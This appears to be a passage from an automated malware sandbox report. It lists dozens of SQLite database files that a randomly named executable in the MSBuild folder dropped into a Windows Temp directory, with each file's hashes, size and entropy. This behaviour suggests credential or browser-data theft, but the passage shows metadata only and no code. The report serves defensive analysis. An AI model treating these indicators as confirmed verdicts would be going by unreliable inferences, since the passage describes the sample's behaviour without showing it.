                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\qkGI9Fy3RM

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\rpYtetqegq

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\rx1LBGto9C

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\sKrbP6YJJe

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\sXwZ8vH3EF

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\sbUCFVQQZ2

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\t6HxU81RZw

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tLbSb8eUVj

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tPfdZHmUeL

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tWJemnyJvx

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tY4gawHpQT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ty8AV89dhE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\uAGJ4oIFtj

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ukylifks7D

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\uxFXYtFL3Y

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\v88wvUdyVd

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\vFSJxgETvt

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\vLyY9JycBF

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\vscBin6hqM

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\w7DrY5DK7J

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\wJ6I7RGTOP

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\xH7x5ubjFw

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
